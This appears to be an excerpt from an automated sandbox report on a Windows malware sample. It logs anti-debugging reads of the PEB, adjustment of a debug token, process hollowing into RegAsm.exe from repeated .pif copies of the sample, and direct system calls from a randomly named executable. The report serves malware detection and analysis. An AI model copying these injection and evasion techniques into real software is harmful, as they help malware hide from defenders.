            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2E420 mov eax, dword ptr fs:[00000030h]7_2_02F2E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2E420 mov eax, dword ptr fs:[00000030h]7_2_02F2E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2E420 mov eax, dword ptr fs:[00000030h]7_2_02F2E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F2C427 mov eax, dword ptr fs:[00000030h]7_2_02F2C427
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB6420 mov eax, dword ptr fs:[00000030h]7_2_02FB6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB6420 mov eax, dword ptr fs:[00000030h]7_2_02FB6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB6420 mov eax, dword ptr fs:[00000030h]7_2_02FB6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB6420 mov eax, dword ptr fs:[00000030h]7_2_02FB6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB6420 mov eax, dword ptr fs:[00000030h]7_2_02FB6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB6420 mov eax, dword ptr fs:[00000030h]7_2_02FB6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB6420 mov eax, dword ptr fs:[00000030h]7_2_02FB6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F68402 mov eax, dword ptr fs:[00000030h]7_2_02F68402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F68402 mov eax, dword ptr fs:[00000030h]7_2_02F68402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F68402 mov eax, dword ptr fs:[00000030h]7_2_02F68402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]7_2_02F5E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]7_2_02F5E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]7_2_02F5E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]7_2_02F5E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]7_2_02F5E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]7_2_02F5E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]7_2_02F5E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]7_2_02F5E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F325E0 mov eax, dword ptr fs:[00000030h]7_2_02F325E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6C5ED mov eax, dword ptr fs:[00000030h]7_2_02F6C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6C5ED mov eax, dword ptr fs:[00000030h]7_2_02F6C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F365D0 mov eax, dword ptr fs:[00000030h]7_2_02F365D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]7_2_02F6A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]7_2_02F6A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6E5CF mov eax, dword ptr fs:[00000030h]7_2_02F6E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6E5CF mov eax, dword ptr fs:[00000030h]7_2_02F6E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F545B1 mov eax, dword ptr fs:[00000030h]7_2_02F545B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F545B1 mov eax, dword ptr fs:[00000030h]7_2_02F545B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB05A7 mov eax, dword ptr fs:[00000030h]7_2_02FB05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB05A7 mov eax, dword ptr fs:[00000030h]7_2_02FB05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FB05A7 mov eax, dword ptr fs:[00000030h]7_2_02FB05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6E59C mov eax, dword ptr fs:[00000030h]7_2_02F6E59C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F32582 mov eax, dword ptr fs:[00000030h]7_2_02F32582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F32582 mov ecx, dword ptr fs:[00000030h]7_2_02F32582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F64588 mov eax, dword ptr fs:[00000030h]7_2_02F64588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6656A mov eax, dword ptr fs:[00000030h]7_2_02F6656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6656A mov eax, dword ptr fs:[00000030h]7_2_02F6656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6656A mov eax, dword ptr fs:[00000030h]7_2_02F6656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F38550 mov eax, dword ptr fs:[00000030h]7_2_02F38550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F38550 mov eax, dword ptr fs:[00000030h]7_2_02F38550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40535 mov eax, dword ptr fs:[00000030h]7_2_02F40535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40535 mov eax, dword ptr fs:[00000030h]7_2_02F40535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40535 mov eax, dword ptr fs:[00000030h]7_2_02F40535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40535 mov eax, dword ptr fs:[00000030h]7_2_02F40535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40535 mov eax, dword ptr fs:[00000030h]7_2_02F40535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40535 mov eax, dword ptr fs:[00000030h]7_2_02F40535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E53E mov eax, dword ptr fs:[00000030h]7_2_02F5E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E53E mov eax, dword ptr fs:[00000030h]7_2_02F5E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E53E mov eax, dword ptr fs:[00000030h]7_2_02F5E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E53E mov eax, dword ptr fs:[00000030h]7_2_02F5E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5E53E mov eax, dword ptr fs:[00000030h]7_2_02F5E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FC6500 mov eax, dword ptr fs:[00000030h]7_2_02FC6500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03004B00 mov eax, dword ptr fs:[00000030h]7_2_03004B00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6AAEE mov eax, dword ptr fs:[00000030h]7_2_02F6AAEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6AAEE mov eax, dword ptr fs:[00000030h]7_2_02F6AAEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F30AD0 mov eax, dword ptr fs:[00000030h]7_2_02F30AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F64AD0 mov eax, dword ptr fs:[00000030h]7_2_02F64AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F64AD0 mov eax, dword ptr fs:[00000030h]7_2_02F64AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F86ACC mov eax, dword ptr fs:[00000030h]7_2_02F86ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F86ACC mov eax, dword ptr fs:[00000030h]7_2_02F86ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F86ACC mov eax, dword ptr fs:[00000030h]7_2_02F86ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F38AA0 mov eax, dword ptr fs:[00000030h]7_2_02F38AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F38AA0 mov eax, dword ptr fs:[00000030h]7_2_02F38AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03002B57 mov eax, dword ptr fs:[00000030h]7_2_03002B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03002B57 mov eax, dword ptr fs:[00000030h]7_2_03002B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03002B57 mov eax, dword ptr fs:[00000030h]7_2_03002B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_03002B57 mov eax, dword ptr fs:[00000030h]7_2_03002B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F86AA4 mov eax, dword ptr fs:[00000030h]7_2_02F86AA4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F68A90 mov edx, dword ptr fs:[00000030h]7_2_02F68A90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3EA80 mov eax, dword ptr fs:[00000030h]7_2_02F3EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3EA80 mov eax, dword ptr fs:[00000030h]7_2_02F3EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3EA80 mov eax, dword ptr fs:[00000030h]7_2_02F3EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3EA80 mov eax, dword ptr fs:[00000030h]7_2_02F3EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3EA80 mov eax, dword ptr fs:[00000030h]7_2_02F3EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3EA80 mov eax, dword ptr fs:[00000030h]7_2_02F3EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3EA80 mov eax, dword ptr fs:[00000030h]7_2_02F3EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3EA80 mov eax, dword ptr fs:[00000030h]7_2_02F3EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F3EA80 mov eax, dword ptr fs:[00000030h]7_2_02F3EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FACA72 mov eax, dword ptr fs:[00000030h]7_2_02FACA72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FACA72 mov eax, dword ptr fs:[00000030h]7_2_02FACA72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6CA6F mov eax, dword ptr fs:[00000030h]7_2_02F6CA6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6CA6F mov eax, dword ptr fs:[00000030h]7_2_02F6CA6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6CA6F mov eax, dword ptr fs:[00000030h]7_2_02F6CA6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDEA60 mov eax, dword ptr fs:[00000030h]7_2_02FDEA60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F36A50 mov eax, dword ptr fs:[00000030h]7_2_02F36A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F36A50 mov eax, dword ptr fs:[00000030h]7_2_02F36A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F36A50 mov eax, dword ptr fs:[00000030h]7_2_02F36A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F36A50 mov eax, dword ptr fs:[00000030h]7_2_02F36A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F36A50 mov eax, dword ptr fs:[00000030h]7_2_02F36A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F36A50 mov eax, dword ptr fs:[00000030h]7_2_02F36A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F36A50 mov eax, dword ptr fs:[00000030h]7_2_02F36A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40A5B mov eax, dword ptr fs:[00000030h]7_2_02F40A5B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F40A5B mov eax, dword ptr fs:[00000030h]7_2_02F40A5B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F54A35 mov eax, dword ptr fs:[00000030h]7_2_02F54A35
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F54A35 mov eax, dword ptr fs:[00000030h]7_2_02F54A35
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6CA38 mov eax, dword ptr fs:[00000030h]7_2_02F6CA38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F6CA24 mov eax, dword ptr fs:[00000030h]7_2_02F6CA24
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5EA2E mov eax, dword ptr fs:[00000030h]7_2_02F5EA2E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FBCA11 mov eax, dword ptr fs:[00000030h]7_2_02FBCA11
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F38BF0 mov eax, dword ptr fs:[00000030h]7_2_02F38BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F38BF0 mov eax, dword ptr fs:[00000030h]7_2_02F38BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F38BF0 mov eax, dword ptr fs:[00000030h]7_2_02F38BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F5EBFC mov eax, dword ptr fs:[00000030h]7_2_02F5EBFC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FBCBF0 mov eax, dword ptr fs:[00000030h]7_2_02FBCBF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02FDEBD0 mov eax, dword ptr fs:[00000030h]7_2_02FDEBD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F50BCB mov eax, dword ptr fs:[00000030h]7_2_02F50BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F50BCB mov eax, dword ptr fs:[00000030h]7_2_02F50BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F50BCB mov eax, dword ptr fs:[00000030h]7_2_02F50BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_02F30BCD mov eax, dword ptr fs:[00000030h]7_2_02F30BCD
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtOpenSection: Direct from: 0x76EF2E0C
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtTerminateThread: Direct from: 0x76EF2FCC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtReadFile: Direct from: 0x76EF2ADC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtResumeThread: Direct from: 0x76EF2FBC
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtCreateUserProcess: Direct from: 0x76EF371C
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtWriteVirtualMemory: Direct from: 0x76EF490C
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtSetInformationThread: Direct from: 0x76EE63F9
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
